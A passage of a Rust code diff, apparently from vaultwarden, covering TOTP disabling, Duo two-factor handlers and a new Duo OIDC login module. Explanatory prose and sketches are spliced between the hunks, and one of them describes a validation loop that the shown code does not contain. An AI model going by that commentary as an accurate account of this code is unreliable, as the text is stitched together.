+    key: String,
+    master_password_hash: String,
+    r#type: NumberOrString,
+}
+
+#[delete("/two-factor/authenticator", data = "<data>")]
+async fn disable_authenticator(data: Json<DisableAuthenticatorData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let user = headers.user;
+    let type_ = data.r#type.into_i32()?;
+
+    if !user.check_valid_password(&data.master_password_hash) {
+        err!("Invalid password");
+    }
+
+    if let Some(twofactor) = TwoFactor::find_by_user_and_type(&user.uuid, type_, &mut conn).await {
+        if twofactor.data == data.key {
+            twofactor.delete(&mut conn).await?;
+            log_user_event(
+                EventType::UserDisabled2fa as i32,
+                &user.uuid,
+                headers.device.atype,
+                &headers.ip.ip,
+                &mut conn,
+            )
+            .await;
+        } else {
+            err!(format!("TOTP key for user {} does not match recorded value, cannot deactivate", &user.email));
+        }
+    }
+
+    if TwoFactor::find_by_user(&user.uuid, &mut conn).await.is_empty() {
+        super::enforce_2fa_policy(&user, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await?;
+    }
+
+    Ok(Json(json!({
+        "enabled": false,
+        "keys": type_,
+        "object": "twoFactorProvider"
+    })))
+}
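The validation loop above generates a candidate code for each 30-second step in a small window around the current time, and additionally requires the matched step to be strictly newer than the stored `last_used` value, so replaying a still-in-window code is rejected. A self-contained sketch of the window scan, using the same `totp_lite::totp_custom` call; the helper name and return convention are illustrative, not vaultwarden's:

// Returns the matched time step if any candidate in [-steps, +steps] matches.
use totp_lite::{totp_custom, Sha1};

fn code_matches(decoded_secret: &[u8], supplied: &str, now_ts: i64, steps: i64) -> Option<i64> {
    for step in -steps..=steps {
        let time = (now_ts + step * 30) as u64;
        let generated = totp_custom::<Sha1>(30, 6, decoded_secret, time);
        if generated == supplied {
            // A real caller must also require this step > last_used to block replays.
            return Some(now_ts / 30 + step);
        }
    }
    None
}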
@@ -5,17 +5,17 @@ use rocket::Route;
 
 use crate::{
     api::{
-        core::log_user_event, core::two_factor::_generate_recover_code, ApiResult, EmptyResult, JsonResult, JsonUpcase,
+        core::log_user_event, core::two_factor::_generate_recover_code, ApiResult, EmptyResult, JsonResult,
         PasswordOrOtpData,
     },
     auth::Headers,
     crypto,
     db::{
-        models::{EventType, TwoFactor, TwoFactorType, User},
+        models::{EventType, TwoFactor, TwoFactorType, User, UserId},
         DbConn,
     },
     error::MapResult,
-    util::get_reqwest_client,
+    http_client::make_http_request,
     CONFIG,
 };
 
@@ -26,8 +26,8 @@ pub fn routes() -> Vec<Route> {
 #[derive(Serialize, Deserialize)]
 struct DuoData {
     host: String, // Duo API hostname
-    ik: String, // integration key
-    sk: String, // secret key
+    ik: String, // client id
+    sk: String, // client secret
 }
 
 impl DuoData {
@@ -92,8 +92,8 @@ impl DuoStatus {
 const DISABLED_MESSAGE_DEFAULT: &str = "<To use the global Duo keys, please leave these fields untouched>";
 
 #[post("/two-factor/get-duo", data = "<data>")]
-async fn get_duo(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let data: PasswordOrOtpData = data.into_inner().data;
+async fn get_duo(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let data: PasswordOrOtpData = data.into_inner();
     let user = headers.user;
 
     data.validate(&user, false, &mut conn).await?;
@@ -109,16 +109,19 @@ async fn get_duo(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn
 
     let json = if let Some(data) = data {
         json!({
-            "Enabled": enabled,
-            "Host": data.host,
-            "SecretKey": data.sk,
-            "IntegrationKey": data.ik,
-            "Object": "twoFactorDuo"
+            "enabled": enabled,
+            "host": data.host,
+            "clientSecret": data.sk,
+            "clientId": data.ik,
+            "object": "twoFactorDuo"
         })
     } else {
         json!({
-            "Enabled": enabled,
-            "Object": "twoFactorDuo"
+            "enabled": enabled,
+            "host": null,
+            "clientSecret": null,
+            "clientId": null,
+            "object": "twoFactorDuo"
         })
     };
 
@@ -126,21 +129,21 @@ async fn get_duo(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn
 }
 
 #[derive(Deserialize)]
-#[allow(non_snake_case, dead_code)]
+#[serde(rename_all = "camelCase")]
 struct EnableDuoData {
-    Host: String,
-    SecretKey: String,
-    IntegrationKey: String,
-    MasterPasswordHash: Option<String>,
-    Otp: Option<String>,
+    host: String,
+    client_secret: String,
+    client_id: String,
+    master_password_hash: Option<String>,
+    otp: Option<String>,
 }
 
 impl From<EnableDuoData> for DuoData {
     fn from(d: EnableDuoData) -> Self {
         Self {
-            host: d.Host,
-            ik: d.IntegrationKey,
-            sk: d.SecretKey,
+            host: d.host,
+            ik: d.client_id,
+            sk: d.client_secret,
         }
     }
 }
@@ -151,17 +154,17 @@ fn check_duo_fields_custom(data: &EnableDuoData) -> bool {
         st.is_empty() || s == DISABLED_MESSAGE_DEFAULT
     }
 
-    !empty_or_default(&data.Host) && !empty_or_default(&data.SecretKey) && !empty_or_default(&data.IntegrationKey)
+    !empty_or_default(&data.host) && !empty_or_default(&data.client_secret) && !empty_or_default(&data.client_id)
 }
 
 #[post("/two-factor/duo", data = "<data>")]
-async fn activate_duo(data: JsonUpcase<EnableDuoData>, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let data: EnableDuoData = data.into_inner().data;
+async fn activate_duo(data: Json<EnableDuoData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let data: EnableDuoData = data.into_inner();
     let mut user = headers.user;
 
     PasswordOrOtpData {
-        MasterPasswordHash: data.MasterPasswordHash.clone(),
-        Otp: data.Otp.clone(),
+        master_password_hash: data.master_password_hash.clone(),
+        otp: data.otp.clone(),
     }
     .validate(&user, true, &mut conn)
     .await?;
@@ -184,16 +187,16 @@ async fn activate_duo(data: JsonUpcase<EnableDuoData>, headers: Headers, mut con
     log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
 
     Ok(Json(json!({
-        "Enabled": true,
-        "Host": data.host,
-        "SecretKey": data.sk,
-        "IntegrationKey": data.ik,
-        "Object": "twoFactorDuo"
+        "enabled": true,
+        "host": data.host,
+        "clientSecret": data.sk,
+        "clientId": data.ik,
+        "object": "twoFactorDuo"
     })))
 }
 
 #[put("/two-factor/duo", data = "<data>")]
-async fn activate_duo_put(data: JsonUpcase<EnableDuoData>, headers: Headers, conn: DbConn) -> JsonResult {
+async fn activate_duo_put(data: Json<EnableDuoData>, headers: Headers, conn: DbConn) -> JsonResult {
     activate_duo(data, headers, conn).await
 }
 
@@ -202,7 +205,7 @@ async fn duo_api_request(method: &str, path: &str, params: &str, data: &DuoData)
     use std::str::FromStr;
 
     // https://duo.com/docs/authapi#api-details
-    let url = format!("https://{}{}", &data.host, path);
+    let url = format!("https://{}{path}", &data.host);
     let date = Utc::now().to_rfc2822();
     let username = &data.ik;
     let fields = [&date, method, &data.host, path, params];
@@ -210,10 +213,7 @@ async fn duo_api_request(method: &str, path: &str, params: &str, data: &DuoData)
 
     let m = Method::from_str(method).unwrap_or_default();
 
-    let client = get_reqwest_client();
-
-    client
-        .request(m, &url)
+    make_http_request(m, &url)?
         .basic_auth(username, Some(password))
         .header(header::USER_AGENT, "vaultwarden:Duo/1.0 (Rust)")
         .header(header::DATE, date)
@@ -231,13 +231,12 @@ const AUTH_PREFIX: &str = "AUTH";
 const DUO_PREFIX: &str = "TX";
 const APP_PREFIX: &str = "APP";
 
-async fn get_user_duo_data(uuid: &str, conn: &mut DbConn) -> DuoStatus {
+async fn get_user_duo_data(user_id: &UserId, conn: &mut DbConn) -> DuoStatus {
     let type_ = TwoFactorType::Duo as i32;
 
     // If the user doesn't have an entry, disabled
-    let twofactor = match TwoFactor::find_by_user_and_type(uuid, type_, conn).await {
-        Some(t) => t,
-        None => return DuoStatus::Disabled(DuoData::global().is_some()),
+    let Some(twofactor) = TwoFactor::find_by_user_and_type(user_id, type_, conn).await else {
+        return DuoStatus::Disabled(DuoData::global().is_some());
     };
 
     // If the user has the required values, we use those
@@ -255,14 +254,14 @@ async fn get_user_duo_data(uuid: &str, conn: &mut DbConn) -> DuoStatus {
 }
 
 // let (ik, sk, ak, host) = get_duo_keys();
-async fn get_duo_keys_email(email: &str, conn: &mut DbConn) -> ApiResult<(String, String, String, String)> {
+pub(crate) async fn get_duo_keys_email(email: &str, conn: &mut DbConn) -> ApiResult<(String, String, String, String)> {
     let data = match User::find_by_mail(email, conn).await {
         Some(u) => get_user_duo_data(&u.uuid, conn).await.data(),
        _ => DuoData::global(),
     }
     .map_res("Can't fetch Duo Keys")?;
 
-    Ok((data.ik, data.sk, CONFIG.get_duo_akey(), data.host))
+    Ok((data.ik, data.sk, CONFIG.get_duo_akey().await, data.host))
 }
 
 pub async fn generate_duo_signature(email: &str, conn: &mut DbConn) -> ApiResult<(String, String)> {
@@ -278,16 +277,12 @@ pub async fn generate_duo_signature(email: &str, conn: &mut DbConn) -> ApiResult
 
 fn sign_duo_values(key: &str, email: &str, ikey: &str, prefix: &str, expire: i64) -> String {
     let val = format!("{email}|{ikey}|{expire}");
-    let cookie = format!("{}|{}", prefix, BASE64.encode(val.as_bytes()));
+    let cookie = format!("{prefix}|{}", BASE64.encode(val.as_bytes()));
 
-    format!("{}|{}", cookie, crypto::hmac_sign(key, &cookie))
+    format!("{cookie}|{}", crypto::hmac_sign(key, &cookie))
 }
 
 pub async fn validate_duo_login(email: &str, response: &str, conn: &mut DbConn) -> EmptyResult {
-    // email is as entered by the user, so it needs to be normalized before
-    // comparison with auth_user below.
-    let email = &email.to_lowercase();
-
     let split: Vec<&str> = response.split(':').collect();
     if split.len() != 2 {
         err!(
@@ -340,14 +335,12 @@ fn parse_duo_values(key: &str, val: &str, ikey: &str, prefix: &str, time: i64) -
         err!("Prefixes don't match")
     }
 
-    let cookie_vec = match BASE64.decode(u_b64.as_bytes()) {
-        Ok(c) => c,
-        Err(_) => err!("Invalid Duo cookie encoding"),
+    let Ok(cookie_vec) = BASE64.decode(u_b64.as_bytes()) else {
+        err!("Invalid Duo cookie encoding")
     };
 
-    let cookie = match String::from_utf8(cookie_vec) {
-        Ok(c) => c,
-        Err(_) => err!("Invalid Duo cookie encoding"),
+    let Ok(cookie) = String::from_utf8(cookie_vec) else {
+        err!("Invalid Duo cookie encoding")
     };
 
     let cookie_split: Vec<&str> = cookie.split('|').collect();
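For reference, the value produced by `sign_duo_values` above has the classic Duo Web v2 shape: `PREFIX|base64(email|ikey|expire)|hmac(key, cookie)`. A sketch of the same construction, with the HMAC passed in as a closure since `crypto::hmac_sign`'s internals are not shown in this diff:

// Illustrative reconstruction; `hmac` stands in for crate::crypto::hmac_sign.
use data_encoding::BASE64;

fn sign(key: &str, email: &str, ikey: &str, prefix: &str, expire: i64, hmac: impl Fn(&str, &str) -> String) -> String {
    let val = format!("{email}|{ikey}|{expire}");
    let cookie = format!("{prefix}|{}", BASE64.encode(val.as_bytes()));
    format!("{cookie}|{}", hmac(key, &cookie))
}

The signature covers the whole prefixed cookie, so neither the expiry nor the embedded email can be altered without invalidating the final HMAC segment.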
src/api/core/two_factor/duo_oidc.rs (new file, 495 lines)
@@ -0,0 +1,495 @@
+use chrono::Utc;
+use data_encoding::HEXLOWER;
+use jsonwebtoken::{Algorithm, DecodingKey, EncodingKey, Header, Validation};
+use reqwest::{header, StatusCode};
+use ring::digest::{digest, Digest, SHA512_256};
+use serde::Serialize;
+use std::collections::HashMap;
+
+use crate::{
+    api::{core::two_factor::duo::get_duo_keys_email, EmptyResult},
+    crypto,
+    db::{
+        models::{DeviceId, EventType, TwoFactorDuoContext},
+        DbConn, DbPool,
+    },
+    error::Error,
+    http_client::make_http_request,
+    CONFIG,
+};
+use url::Url;
+
+// The location on this service that Duo should redirect users to. For us, this is a bridge
+// built in to the Bitwarden clients.
+// See: https://github.com/bitwarden/clients/blob/5fb46df3415aefced0b52f2db86c873962255448/apps/web/src/connectors/duo-redirect.ts
+const DUO_REDIRECT_LOCATION: &str = "duo-redirect-connector.html";
+
+// Number of seconds that a JWT we generate for Duo should be valid for.
+const JWT_VALIDITY_SECS: i64 = 300;
+
+// Number of seconds that a Duo context stored in the database should be valid for.
+const CTX_VALIDITY_SECS: i64 = 300;
+
+// Expected algorithm used by Duo to sign JWTs.
+const DUO_RESP_SIGNATURE_ALG: Algorithm = Algorithm::HS512;
+
+// Signature algorithm we're using to sign JWTs for Duo. Must be either HS512 or HS256.
+const JWT_SIGNATURE_ALG: Algorithm = Algorithm::HS512;
+
+// Size of random strings for state and nonce. Must be at least 16 characters and at most 1024 characters.
+// If increasing this above 64, also increase the size of the twofactor_duo_ctx.state and
+// twofactor_duo_ctx.nonce database columns for postgres and mariadb.
+const STATE_LENGTH: usize = 64;
+
+// client_assertion payload for health checks and obtaining MFA results.
+#[derive(Debug, Serialize, Deserialize)]
+struct ClientAssertion {
+    pub iss: String,
+    pub sub: String,
+    pub aud: String,
+    pub exp: i64,
+    pub jti: String,
+    pub iat: i64,
+}
+
+// authorization request payload sent with clients to Duo for MFA
+#[derive(Debug, Serialize, Deserialize)]
+struct AuthorizationRequest {
+    pub response_type: String,
+    pub scope: String,
+    pub exp: i64,
+    pub client_id: String,
+    pub redirect_uri: String,
+    pub state: String,
+    pub duo_uname: String,
+    pub iss: String,
+    pub aud: String,
+    pub nonce: String,
+}
+
+// Duo service health check responses
+#[derive(Debug, Serialize, Deserialize)]
+#[serde(untagged)]
+enum HealthCheckResponse {
+    HealthOK {
+        stat: String,
+    },
+    HealthFail {
+        message: String,
+        message_detail: String,
+    },
+}
+
+// Outer structure of response when exchanging authz code for MFA results
+#[derive(Debug, Serialize, Deserialize)]
+struct IdTokenResponse {
+    id_token: String, // IdTokenClaims
+    access_token: String,
+    expires_in: i64,
+    token_type: String,
+}
+
+// Inner structure of IdTokenResponse.id_token
+#[derive(Debug, Serialize, Deserialize)]
+struct IdTokenClaims {
+    preferred_username: String,
+    nonce: String,
+}
+
+// Duo OIDC Authorization Client
+// See https://duo.com/docs/oauthapi
+struct DuoClient {
+    client_id: String, // Duo Client ID (DuoData.ik)
+    client_secret: String, // Duo Client Secret (DuoData.sk)
+    api_host: String, // Duo API hostname (DuoData.host)
+    redirect_uri: String, // URL in this application clients should call for MFA verification
+}
+
+impl DuoClient {
+    // Construct a new DuoClient
+    fn new(client_id: String, client_secret: String, api_host: String, redirect_uri: String) -> DuoClient {
+        DuoClient {
+            client_id,
+            client_secret,
+            api_host,
+            redirect_uri,
+        }
+    }
+
+    // Generate a client assertion for health checks and authorization code exchange.
+    fn new_client_assertion(&self, url: &str) -> ClientAssertion {
+        let now = Utc::now().timestamp();
+        let jwt_id = crypto::get_random_string_alphanum(STATE_LENGTH);
+
+        ClientAssertion {
+            iss: self.client_id.clone(),
+            sub: self.client_id.clone(),
+            aud: url.to_string(),
+            exp: now + JWT_VALIDITY_SECS,
+            jti: jwt_id,
+            iat: now,
+        }
+    }
+
+    // Given a serde-serializable struct, attempt to encode it as a JWT
+    fn encode_duo_jwt<T: Serialize>(&self, jwt_payload: T) -> Result<String, Error> {
+        match jsonwebtoken::encode(
+            &Header::new(JWT_SIGNATURE_ALG),
+            &jwt_payload,
+            &EncodingKey::from_secret(self.client_secret.as_bytes()),
+        ) {
+            Ok(token) => Ok(token),
+            Err(e) => err!(format!("Error encoding Duo JWT: {e:?}")),
+        }
+    }
+
+    // "required" health check to verify the integration is configured and Duo's services
+    // are up.
+    // https://duo.com/docs/oauthapi#health-check
+    async fn health_check(&self) -> Result<(), Error> {
+        let health_check_url: String = format!("https://{}/oauth/v1/health_check", self.api_host);
+
+        let jwt_payload = self.new_client_assertion(&health_check_url);
+
+        let token = match self.encode_duo_jwt(jwt_payload) {
+            Ok(token) => token,
+            Err(e) => return Err(e),
+        };
+
+        let mut post_body = HashMap::new();
+        post_body.insert("client_assertion", token);
+        post_body.insert("client_id", self.client_id.clone());
+
+        let res = match make_http_request(reqwest::Method::POST, &health_check_url)?
+            .header(header::USER_AGENT, "vaultwarden:Duo/2.0 (Rust)")
+            .form(&post_body)
+            .send()
+            .await
+        {
+            Ok(r) => r,
+            Err(e) => err!(format!("Error requesting Duo health check: {e:?}")),
+        };
+
+        let response: HealthCheckResponse = match res.json::<HealthCheckResponse>().await {
+            Ok(r) => r,
+            Err(e) => err!(format!("Duo health check response decode error: {e:?}")),
+        };
+
+        let health_stat: String = match response {
+            HealthCheckResponse::HealthOK {
+                stat,
+            } => stat,
+            HealthCheckResponse::HealthFail {
+                message,
+                message_detail,
+            } => err!(format!("Duo health check FAIL response, msg: {message}, detail: {message_detail}")),
+        };
+
+        if health_stat != "OK" {
+            err!(format!("Duo health check failed, got OK-like body with stat {health_stat}"));
+        }
+
+        Ok(())
+    }
+
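Both `health_check` above and the token exchange later in this file authenticate in the RFC 7523 style: instead of sending the client secret itself, the client POSTs a short-lived HS512 JWT (`client_assertion`) whose `iss`/`sub` are the client id and whose `aud` is the exact endpoint URL. The form layout for the token endpoint, pulled out into a hypothetical helper purely for illustration:

// Hypothetical helper; field names come straight from the diff, the function does not exist in vaultwarden.
use std::collections::HashMap;

fn token_request_body(assertion_jwt: String, code: &str, redirect_uri: &str) -> HashMap<&'static str, String> {
    let mut body = HashMap::new();
    body.insert("grant_type", "authorization_code".to_string());
    body.insert("code", code.to_string());
    // Must match the redirect_uri from the original authorization request.
    body.insert("redirect_uri", redirect_uri.to_string());
    body.insert("client_assertion_type", "urn:ietf:params:oauth:client-assertion-type:jwt-bearer".to_string());
    body.insert("client_assertion", assertion_jwt);
    body
}

Binding the assertion's audience to the endpoint URL means a captured assertion for the health check cannot be replayed against the token endpoint.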
+    // Constructs the URL for the authorization request endpoint on Duo's service.
+    // Clients are sent here to continue authentication.
+    // https://duo.com/docs/oauthapi#authorization-request
+    fn make_authz_req_url(&self, duo_username: &str, state: String, nonce: String) -> Result<String, Error> {
+        let now = Utc::now().timestamp();
+
+        let jwt_payload = AuthorizationRequest {
+            response_type: String::from("code"),
+            scope: String::from("openid"),
+            exp: now + JWT_VALIDITY_SECS,
+            client_id: self.client_id.clone(),
+            redirect_uri: self.redirect_uri.clone(),
+            state,
+            duo_uname: String::from(duo_username),
+            iss: self.client_id.clone(),
+            aud: format!("https://{}", self.api_host),
+            nonce,
+        };
+
+        let token = self.encode_duo_jwt(jwt_payload)?;
+
+        let authz_endpoint = format!("https://{}/oauth/v1/authorize", self.api_host);
+        let mut auth_url = match Url::parse(authz_endpoint.as_str()) {
+            Ok(url) => url,
+            Err(e) => err!(format!("Error parsing Duo authorization URL: {e:?}")),
+        };
+
+        {
+            let mut query_params = auth_url.query_pairs_mut();
+            query_params.append_pair("response_type", "code");
+            query_params.append_pair("client_id", self.client_id.as_str());
+            query_params.append_pair("request", token.as_str());
+        }
+
+        let final_auth_url = auth_url.to_string();
+        Ok(final_auth_url)
+    }
+
+    // Exchange the authorization code obtained from an access token provided by the user
+    // for the result of the MFA and validate.
+    // See: https://duo.com/docs/oauthapi#access-token (under Response Format)
+    async fn exchange_authz_code_for_result(
+        &self,
+        duo_code: &str,
+        duo_username: &str,
+        nonce: &str,
+    ) -> Result<(), Error> {
+        if duo_code.is_empty() {
+            err!("Empty Duo authorization code")
+        }
+
+        let token_url = format!("https://{}/oauth/v1/token", self.api_host);
+
+        let jwt_payload = self.new_client_assertion(&token_url);
+
+        let token = match self.encode_duo_jwt(jwt_payload) {
+            Ok(token) => token,
+            Err(e) => return Err(e),
+        };
+
+        let mut post_body = HashMap::new();
+        post_body.insert("grant_type", String::from("authorization_code"));
+        post_body.insert("code", String::from(duo_code));
+
+        // Must be the same URL that was supplied in the authorization request for the supplied duo_code
+        post_body.insert("redirect_uri", self.redirect_uri.clone());
+
+        post_body
+            .insert("client_assertion_type", String::from("urn:ietf:params:oauth:client-assertion-type:jwt-bearer"));
+        post_body.insert("client_assertion", token);
+
+        let res = match make_http_request(reqwest::Method::POST, &token_url)?
+            .header(header::USER_AGENT, "vaultwarden:Duo/2.0 (Rust)")
+            .form(&post_body)
+            .send()
+            .await
+        {
+            Ok(r) => r,
+            Err(e) => err!(format!("Error exchanging Duo code: {e:?}")),
+        };
+
+        let status_code = res.status();
+        if status_code != StatusCode::OK {
+            err!(format!("Failure response from Duo: {status_code}"))
+        }
+
+        let response: IdTokenResponse = match res.json::<IdTokenResponse>().await {
+            Ok(r) => r,
+            Err(e) => err!(format!("Error decoding ID token response: {e:?}")),
+        };
+
+        let mut validation = Validation::new(DUO_RESP_SIGNATURE_ALG);
+        validation.set_required_spec_claims(&["exp", "aud", "iss"]);
+        validation.set_audience(&[&self.client_id]);
+        validation.set_issuer(&[token_url.as_str()]);
+
+        let token_data = match jsonwebtoken::decode::<IdTokenClaims>(
+            &response.id_token,
+            &DecodingKey::from_secret(self.client_secret.as_bytes()),
+            &validation,
+        ) {
+            Ok(c) => c,
+            Err(e) => err!(format!("Failed to decode Duo token {e:?}")),
+        };
+
+        let matching_nonces = crypto::ct_eq(nonce, &token_data.claims.nonce);
+        let matching_usernames = crypto::ct_eq(duo_username, &token_data.claims.preferred_username);
+
+        if !(matching_nonces && matching_usernames) {
+            err!("Error validating Duo authorization, nonce or username mismatch.")
+        };
+
+        Ok(())
+    }
+}
+
+struct DuoAuthContext {
+    pub state: String,
+    pub user_email: String,
+    pub nonce: String,
+    pub exp: i64,
+}
+
+// Given a state string, retrieve the associated Duo auth context and
+// delete the retrieved state from the database.
+async fn extract_context(state: &str, conn: &mut DbConn) -> Option<DuoAuthContext> {
+    let ctx: TwoFactorDuoContext = match TwoFactorDuoContext::find_by_state(state, conn).await {
+        Some(c) => c,
+        None => return None,
+    };
+
+    if ctx.exp < Utc::now().timestamp() {
+        ctx.delete(conn).await.ok();
+        return None;
+    }
+
+    // Copy the context data, so that we can delete the context from
+    // the database before returning.
+    let ret_ctx = DuoAuthContext {
+        state: ctx.state.clone(),
+        user_email: ctx.user_email.clone(),
+        nonce: ctx.nonce.clone(),
+        exp: ctx.exp,
+    };
+
+    ctx.delete(conn).await.ok();
+    Some(ret_ctx)
+}
+
+// Task to clean up expired Duo authentication contexts that may have accumulated in the database.
+pub async fn purge_duo_contexts(pool: DbPool) {
+    debug!("Purging Duo authentication contexts");
+    if let Ok(mut conn) = pool.get().await {
+        TwoFactorDuoContext::purge_expired_duo_contexts(&mut conn).await;
+    } else {
+        error!("Failed to get DB connection while purging expired Duo authentications")
+    }
+}
+
+// Construct the url that Duo should redirect users to.
+fn make_callback_url(client_name: &str) -> Result<String, Error> {
+    // Get the location of this application as defined in the config.
+    let base = match Url::parse(&format!("{}/", CONFIG.domain())) {
+        Ok(url) => url,
+        Err(e) => err!(format!("Error parsing configured domain URL (check your domain configuration): {e:?}")),
+    };
+
+    // Add the client redirect bridge location
+    let mut callback = match base.join(DUO_REDIRECT_LOCATION) {
+        Ok(url) => url,
+        Err(e) => err!(format!("Error constructing Duo redirect URL (check your domain configuration): {e:?}")),
+    };
+
+    // Add the 'client' string with the authenticating device type. The callback connector uses this
+    // information to figure out how it should handle certain clients.
+    {
+        let mut query_params = callback.query_pairs_mut();
+        query_params.append_pair("client", client_name);
+    }
+    Ok(callback.to_string())
+}
+
+// Pre-redirect first stage of the Duo OIDC authentication flow.
+// Returns the "AuthUrl" that should be returned to clients for MFA.
+pub async fn get_duo_auth_url(
+    email: &str,
+    client_id: &str,
+    device_identifier: &DeviceId,
+    conn: &mut DbConn,
+) -> Result<String, Error> {
+    let (ik, sk, _, host) = get_duo_keys_email(email, conn).await?;
+
+    let callback_url = match make_callback_url(client_id) {
+        Ok(url) => url,
+        Err(e) => return Err(e),
+    };
+
+    let client = DuoClient::new(ik, sk, host, callback_url);
+
+    match client.health_check().await {
+        Ok(()) => {}
+        Err(e) => return Err(e),
+    };
+
+    // Generate random OAuth2 state and OIDC Nonce
+    let state: String = crypto::get_random_string_alphanum(STATE_LENGTH);
+    let nonce: String = crypto::get_random_string_alphanum(STATE_LENGTH);
+
+    // Bind the nonce to the device that's currently authing by hashing the nonce and device id
+    // and sending the result as the OIDC nonce.
+    let d: Digest = digest(&SHA512_256, format!("{nonce}{device_identifier}").as_bytes());
+    let hash: String = HEXLOWER.encode(d.as_ref());
+
+    match TwoFactorDuoContext::save(state.as_str(), email, nonce.as_str(), CTX_VALIDITY_SECS, conn).await {
+        Ok(()) => client.make_authz_req_url(email, state, hash),
+        Err(e) => err!(format!("Error saving Duo authentication context: {e:?}")),
+    }
+}
+
+// Post-redirect second stage of the Duo OIDC authentication flow.
+// Exchanges an authorization code for the MFA result with Duo's API and validates the result.
+pub async fn validate_duo_login(
+    email: &str,
+    two_factor_token: &str,
+    client_id: &str,
+    device_identifier: &DeviceId,
+    conn: &mut DbConn,
+) -> EmptyResult {
+    // Result supplied to us by clients in the form "<authz code>|<state>"
+    let split: Vec<&str> = two_factor_token.split('|').collect();
+    if split.len() != 2 {
+        err!(
+            "Invalid response length",
+            ErrorEvent {
+                event: EventType::UserFailedLogIn2fa
+            }
+        );
+    }
+
+    let code = split[0];
+    let state = split[1];
+
+    let (ik, sk, _, host) = get_duo_keys_email(email, conn).await?;
+
+    // Get the context by the state reported by the client. If we don't have one,
+    // it means the context is either missing or expired.
+    let ctx = match extract_context(state, conn).await {
+        Some(c) => c,
+        None => {
+            err!(
+                "Error validating duo authentication",
+                ErrorEvent {
+                    event: EventType::UserFailedLogIn2fa
+                }
+            )
+        }
+    };
+
+    // Context validation steps
+    let matching_usernames = crypto::ct_eq(email, &ctx.user_email);
+
+    // Probably redundant, but we're double-checking them anyway.
+    let matching_states = crypto::ct_eq(state, &ctx.state);
+    let unexpired_context = ctx.exp > Utc::now().timestamp();
+
+    if !(matching_usernames && matching_states && unexpired_context) {
+        err!(
+            "Error validating duo authentication",
+            ErrorEvent {
+                event: EventType::UserFailedLogIn2fa
+            }
+        )
+    }
+
+    let callback_url = match make_callback_url(client_id) {
+        Ok(url) => url,
+        Err(e) => return Err(e),
+    };
+
+    let client = DuoClient::new(ik, sk, host, callback_url);
+
+    match client.health_check().await {
+        Ok(()) => {}
+        Err(e) => return Err(e),
+    };
+
+    let d: Digest = digest(&SHA512_256, format!("{}{device_identifier}", ctx.nonce).as_bytes());
+    let hash: String = HEXLOWER.encode(d.as_ref());
+
+    match client.exchange_authz_code_for_result(code, email, hash.as_str()).await {
+        Ok(_) => Ok(()),
+        Err(_) => {
+            err!(
+                "Error validating duo authentication",
+                ErrorEvent {
+                    event: EventType::UserFailedLogIn2fa
+                }
+            )
+        }
+    }
+}
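One detail worth calling out in the flow above: the random nonce stored in the Duo context never goes to Duo directly. What is sent as the OIDC nonce, and recomputed during validation, is SHA-512/256 over the nonce concatenated with the device identifier, hex-encoded, which ties the pending authentication to the device that started it. The hashing step in isolation, using the same `ring` and `data_encoding` calls as the new file:

use data_encoding::HEXLOWER;
use ring::digest::{digest, SHA512_256};

// A context saved for one device cannot be completed from another, because the
// recomputed hash (and therefore the ID token's nonce claim) will not match.
fn bound_nonce(nonce: &str, device_identifier: &str) -> String {
    let d = digest(&SHA512_256, format!("{nonce}{device_identifier}").as_bytes());
    HEXLOWER.encode(d.as_ref())
}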
@@ -1,16 +1,16 @@
|
|||||||
use chrono::{Duration, NaiveDateTime, Utc};
|
use chrono::{DateTime, TimeDelta, Utc};
|
||||||
use rocket::serde::json::Json;
|
use rocket::serde::json::Json;
|
||||||
use rocket::Route;
|
use rocket::Route;
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{
|
api::{
|
||||||
core::{log_user_event, two_factor::_generate_recover_code},
|
core::{log_user_event, two_factor::_generate_recover_code},
|
||||||
EmptyResult, JsonResult, JsonUpcase, PasswordOrOtpData,
|
EmptyResult, JsonResult, PasswordOrOtpData,
|
||||||
},
|
},
|
||||||
auth::Headers,
|
auth::Headers,
|
||||||
crypto,
|
crypto,
|
||||||
db::{
|
db::{
|
||||||
models::{EventType, TwoFactor, TwoFactorType},
|
models::{EventType, TwoFactor, TwoFactorType, User, UserId},
|
||||||
DbConn,
|
DbConn,
|
||||||
},
|
},
|
||||||
error::{Error, MapResult},
|
error::{Error, MapResult},
|
||||||
@@ -22,28 +22,30 @@ pub fn routes() -> Vec<Route> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct SendEmailLoginData {
|
struct SendEmailLoginData {
|
||||||
Email: String,
|
// DeviceIdentifier: String, // Currently not used
|
||||||
MasterPasswordHash: String,
|
#[serde(alias = "Email")]
|
||||||
|
email: String,
|
||||||
|
#[serde(alias = "MasterPasswordHash")]
|
||||||
|
master_password_hash: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
/// User is trying to login and wants to use email 2FA.
|
/// User is trying to login and wants to use email 2FA.
|
||||||
/// Does not require Bearer token
|
/// Does not require Bearer token
|
||||||
#[post("/two-factor/send-email-login", data = "<data>")] // JsonResult
|
#[post("/two-factor/send-email-login", data = "<data>")] // JsonResult
|
||||||
async fn send_email_login(data: JsonUpcase<SendEmailLoginData>, mut conn: DbConn) -> EmptyResult {
|
async fn send_email_login(data: Json<SendEmailLoginData>, mut conn: DbConn) -> EmptyResult {
|
||||||
let data: SendEmailLoginData = data.into_inner().data;
|
let data: SendEmailLoginData = data.into_inner();
|
||||||
|
|
||||||
use crate::db::models::User;
|
use crate::db::models::User;
|
||||||
|
|
||||||
// Get the user
|
// Get the user
|
||||||
let user = match User::find_by_mail(&data.Email, &mut conn).await {
|
let Some(user) = User::find_by_mail(&data.email, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Username or password is incorrect. Try again.")
|
||||||
None => err!("Username or password is incorrect. Try again."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
// Check password
|
